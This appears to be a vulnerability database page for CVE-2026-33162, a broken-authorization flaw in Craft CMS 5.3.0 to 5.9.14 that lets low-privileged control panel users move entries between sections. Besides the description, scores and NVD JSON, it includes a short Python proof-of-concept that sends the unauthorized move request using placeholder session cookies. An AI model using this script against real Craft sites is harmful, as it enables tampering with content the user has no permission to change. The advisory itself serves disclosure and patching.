Security Vulnerability Report
CVE-2026-33162 CVSS 6.5 MEDIUM

CVE-2026-33162

Published: 2026-03-24 18:16:10
Last Modified: 2026-03-26 20:41:41

Description

Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
Craft CMS >= 5.3.0, < 5.9.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable Craft CMS instance
target_url = "https://target-craft-site.com/actions/entries/move-to-section"

# Valid session cookie for a user with 'accessCp' permission
# but without 'saveEntries' permission for the target section
cookies = {
    "PHPSESSID": "valid_session_cookie_here",
    "CraftSessionId": "session_id_here"
}

# Exploit payload: Move an entry to an unauthorized section
payload = {
    "entryId": "123",    # ID of the entry to move
    "sectionId": "456",  # ID of the target section (unauthorized)
    "siteId": "1"        # Site ID
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Entry moved without proper permissions.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33162", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:10.420", "lastModified": "2026-03-26T20:41:41.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 5.3.0 hasta antes de la versión 5.9.14, un usuario autenticado del panel de control con solo accessCp puede mover entradas entre secciones a través de POST /actions/entries/move-to-section, incluso cuando no tienen el permiso saveEntries:{sectionUid} para la sección de origen o de destino. Este problema ha sido parcheado en la versión 5.9.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndExcluding": "5.9.14", "matchCriteriaId": "ECC30E7E-C919-4CE7-9A4D-CB5B149922F6"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/3c1ab1c4445dd9237855a66e6a06ecf3591a718e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f582-6gf6-gx4g", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}